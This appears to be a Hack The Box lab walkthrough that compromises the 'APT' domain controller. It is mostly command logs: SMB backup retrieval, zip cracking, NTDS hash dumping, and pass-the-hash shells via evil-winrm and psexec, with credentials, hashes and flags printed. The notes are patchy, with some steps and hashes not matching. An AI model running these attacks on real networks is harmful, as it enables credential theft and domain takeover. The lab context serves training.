I used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py
Reference used:
The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication
┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p '!!!watermelon245'
$nmap -6 -sV dead:beef::b885:d62a:d679:573f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.026s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
80/tcp   open  http         Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z)
135/tcp  open  msrpc        Microsoft Windows RPC
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds
evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#Ny5@2dvht'
1) get the IPv6 address (IOXIDResolver, unauthenticated)
2) connect to it with smbclient and get backup.zip
3) crack the zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dit
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt
┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 .
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw- 10650961 Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $zip2john backup.zip > encrypted.hash$
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time.
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up...
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e
evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2
Thus:
1st: add the IPv6 address to /etc/hosts, because evil-winrm cannot build a URL from a bare IPv6 literal (see the URI::InvalidURIError under 3rd):
dead:beef::b885:d62a:d679:573f apt.htb htb.local
2nd: connect by hostname as henry.vinson_adm
┌─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm
Enter Password: G1#Ny5@2dvh
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls

    Directory: C:\Users\henry.vinson_adm\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/25/2021  11:53 AM          12674 Powerless.bat

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat
Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat
Info: Download successful!
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
3rd: pass-the-hash as Administrator; the bare IPv6 address fails, the /etc/hosts name works
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
Error: Exiting with code 1

┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> net users

User accounts for \\
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
henry.vinson             henry.vinson_adm         krbtgt
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir

    Directory: C:\Users\Administrator

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/24/2020   9:12 AM                Contacts
d-r---       10/23/2020  10:59 AM                Desktop
d-r---        9/24/2020   9:12 AM                Documents
d-r---        9/24/2020   9:12 AM                Downloads
d-r---        9/24/2020   9:12 AM                Favorites
d-r---        9/24/2020   9:12 AM                Links
d-r---        9/24/2020   9:12 AM                Music
d-r---        9/24/2020   9:12 AM                Pictures
d-r---        9/24/2020   9:12 AM                Saved Games
d-r---        9/24/2020   9:12 AM                Searches
d-r---        9/24/2020   9:12 AM                Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/4/2020   1:22 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0ca97e04be5679529b87cc2a2de98782
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   7:54 AM                Administrator
d-----        9/24/2020   8:39 AM                henry.vinson
d-----        9/24/2020   8:40 AM                henry.vinson_adm
d-r---       11/21/2016   2:39 AM                Public

*Evil-WinRM* PS C:\Users> cd henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt
e1e73b8410cf060794a86e7f6a753f83
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on apt.htb.....
[-] share 'backup' is not writable.
[*] Found writable share NETLOGON
[*] Uploading file RJdJAMfb.exe
[*] Opening SVCManager on apt.htb.....
[*] Creating service kOFV on apt.htb.....
[*] Starting service kOFV.....